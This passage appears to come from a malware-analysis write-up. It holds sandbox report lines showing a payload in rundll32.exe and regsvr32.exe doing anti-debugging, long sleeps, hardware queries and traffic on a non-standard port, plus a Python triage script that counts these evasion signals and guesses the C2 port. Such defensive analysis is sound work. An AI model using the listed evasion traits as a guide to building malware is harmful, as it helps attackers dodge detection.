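Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetAdaptersInfo, 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW, 14_2_7F3E6967
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AAF80 mov edx, dword ptr fs:[00000030h] 14_2_7F3AAF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B0DD0 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B0DD0
"""

FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
SOURCE_RE = re.compile(r"^Source: (?P<src>unknown|.+?\.exe) (?P<rest>.*)$")
# Negative sleep values are read as relative intervals (NtDelayExecution convention, assumption).
SLEEP_RE = re.compile(r"Thread sleep time: -(\d+)s|Thread delayed: delay time: (\d+)")
STANDARD_HTTP_PORTS = {80, 443, 8080, 8443}
# Substring -> signal name; each matching line increments the counter for its source process.
SIGNALS = [("Thread sleep time:", "long_sleeps"), ("Thread delayed:", "delays"),
           ("Win32_Processor", "wmi_cpu_queries"), ("Process queried: DebugPort", "debugport_queries"),
           ("IsDebuggerPresent", "isdebuggerpresent"), ("fs:[00000030h]", "peb_reads"),
           ("GetAdaptersInfo", "adapter_enum"), ("ERRORBOX", "error_mode_set")]


def infer_server_port(text: str) -> Tuple[Optional[int], List[int]]:
    """Heuristic: the listener port shows up in every flow, client ports once per connection.
    Returns (server_port, sorted client ports); (None, []) when there are no flows."""
    flows = [(int(a), int(b)) for a, b in FLOW_RE.findall(text)]
    if not flows:
        return None, []
    counts = Counter(p for flow in flows for p in flow)
    top = max(counts.values())
    candidates = [p for p, c in counts.items() if c == top]
    if len(candidates) > 1:  # e.g. a single flow: prefer the side that is the destination
        dst_counts = Counter(b for _, b in flows)
        candidates.sort(key=lambda p: -dst_counts[p])
    server = candidates[0]
    return server, sorted(p for p in counts if p != server)


def longest_delay(text: str) -> int:
    """Largest sleep/delay magnitude in the report (unit printed by the report, kept as-is)."""
    values = [int(a or b) for a, b in SLEEP_RE.findall(text)]
    return max(values) if values else 0


def per_process(text: str) -> Dict[str, Counter]:
    """Count evasion-relevant observations per source image (basename of the Source path)."""
    signals: Dict[str, Counter] = {}
    for line in text.splitlines():
        m = SOURCE_RE.match(line)
        if not m:
            continue
        proc = m["src"].rsplit("\\", 1)[-1]
        counter = signals.setdefault(proc, Counter())
        for needle, name in SIGNALS:
            if needle in m["rest"]:
                counter[name] += 1
    return {p: c for p, c in signals.items() if c}


def triage(text: str) -> Dict:
    server, clients = infer_server_port(text)
    return {"c2_port": server,
            "non_standard_http_port": server is not None and server not in STANDARD_HTTP_PORTS,
            "connections": len(clients),
            "longest_delay": longest_delay(text),
            "per_process": {p: dict(c) for p, c in per_process(text).items()}}


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(f"{key}: {value}")
```

On the sample, the listener is 54801 with three client connections, the longest delay is 130000, and rundll32.exe carries the full anti-analysis set (DebugPort query, IsDebuggerPresent, PEB reads, Win32_Processor query, adapter enumeration) while regsvr32.exe repeats the sleep and WMI checks, which is consistent with the same payload running in both host processes. The port heuristic is a triage aid, not proof: confirm the server side from the PCAP before pivoting on 54801.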
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW, 14_2_7F3E6967
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AAF80 mov edx, dword ptr fs:[00000030h] 14_2_7F3AAF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B0DD0 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B0DD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AE860 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AE860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3728BF mov edx, dword ptr fs:[00000030h] 14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h] 14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h] 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB430 mov edx, dword ptr fs:[00000030h] 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h] 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F396330 mov ecx, dword ptr fs:[00000030h] 14_2_7F396330
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AE390 mov edx, dword ptr fs:[00000030h] 14_2_7F3AE390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E7E46 mov eax, dword ptr fs:[00000030h] 14_2_7F3E7E46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3E7EBB mov eax, dword ptr fs:[00000030h] 14_2_7F3E7EBB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F356D10 mov eax, dword ptr fs:[00000030h] 14_2_7F356D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F377DB0 mov eax, dword ptr fs:[00000030h] 14_2_7F377DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F356DAA mov eax, dword ptr fs:[00000030h] 14_2_7F356DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F37BC30 mov edx, dword ptr fs:[00000030h] 14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F37BC30 mov eax, dword ptr fs:[00000030h] 14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3A9C60 mov eax, dword ptr fs:[00000030h] 14_2_7F3A9C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F356B00 mov edx, dword ptr fs:[00000030h] 14_2_7F356B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F394B90 mov ecx, dword ptr fs:[00000030h] 14_2_7F394B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F376B80 mov edx, dword ptr fs:[00000030h] 14_2_7F376B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F377A60 mov edx, dword ptr fs:[00000030h] 14_2_7F377A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3CFA90 mov eax, dword ptr fs:[00000030h] 14_2_7F3CFA90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F373992 mov edx, dword ptr fs:[00000030h] 14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3848E0 mov ecx, dword ptr fs:[00000030h] 14_2_7F3848E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AA730 mov eax, dword ptr fs:[00000030h] 14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F369790 mov edx, dword ptr fs:[00000030h] 14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h] 14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h] 14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h] 14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h] 14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354664 mov edx, dword ptr fs:[00000030h] 14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AE570 mov eax, dword ptr fs:[00000030h] 14_2_7F3AE570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F37757D mov eax, dword ptr fs:[00000030h] 14_2_7F37757D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h] 14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h] 14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AD5B0 mov edx, dword ptr fs:[00000030h] 14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h] 14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AC340 mov eax, dword ptr fs:[00000030h] 14_2_7F3AC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AE380 mov eax, dword ptr fs:[00000030h] 14_2_7F3AE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F37C230 mov eax, dword ptr fs:[00000030h] 14_2_7F37C230
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AB130 mov eax, dword ptr fs:[00000030h] 14_2_7F3AB130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h] 14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354174 mov edx, dword ptr fs:[00000030h] 14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F354174 mov ecx, dword ptr fs:[00000030h] 14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F357160 mov edx, dword ptr fs:[00000030h] 14_2_7F357160
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov ecx, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov eax, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h] 14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBAF80 mov edx, dword ptr fs:[00000030h] 18_2_7EDBAF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBE860 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBE860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED83972 mov edx, dword ptr fs:[00000030h] 18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h] 18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB430 mov edx, dword ptr fs:[00000030h] 18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h] 18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h] 18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBE390 mov edx, dword ptr fs:[00000030h] 18_2_7EDBE390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA6330 mov ecx, dword ptr fs:[00000030h] 18_2_7EDA6330
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED86ED0 mov edx, dword ptr fs:[00000030h] 18_2_7ED86ED0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF7E8A mov eax, dword ptr fs:[00000030h] 18_2_7EDF7E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF7EBB mov eax, dword ptr fs:[00000030h] 18_2_7EDF7EBB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF7E46 mov eax, dword ptr fs:[00000030h] 18_2_7EDF7E46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h] 18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC7F60 mov edx, dword ptr fs:[00000030h] 18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC7F60 mov eax, dword ptr fs:[00000030h] 18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDF0C78 mov ecx, dword ptr fs:[00000030h] 18_2_7EDF0C78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDB9C60 mov eax, dword ptr fs:[00000030h] 18_2_7EDB9C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED8BC30 mov edx, dword ptr fs:[00000030h] 18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED8BC30 mov eax, dword ptr fs:[00000030h] 18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED87DB0 mov eax, dword ptr fs:[00000030h] 18_2_7ED87DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED66DAA mov eax, dword ptr fs:[00000030h] 18_2_7ED66DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED66D10 mov eax, dword ptr fs:[00000030h] 18_2_7ED66D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov eax, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h] 18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDDFA90 mov eax, dword ptr fs:[00000030h] 18_2_7EDDFA90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC8A40 mov edx, dword ptr fs:[00000030h] 18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC8A40 mov eax, dword ptr fs:[00000030h] 18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h] 18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED87A60 mov edx, dword ptr fs:[00000030h] 18_2_7ED87A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov edx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA4B90 mov ecx, dword ptr fs:[00000030h] 18_2_7EDA4B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED86B80 mov edx, dword ptr fs:[00000030h] 18_2_7ED86B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov ecx, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h] 18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED66B00 mov edx, dword ptr fs:[00000030h] 18_2_7ED66B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED948E0 mov ecx, dword ptr fs:[00000030h] 18_2_7ED948E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h] 18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64664 mov edx, dword ptr fs:[00000030h] 18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED79790 mov edx, dword ptr fs:[00000030h] 18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h] 18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov edx, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h] 18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBA730 mov eax, dword ptr fs:[00000030h] 18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h] 18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h] 18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBD5B0
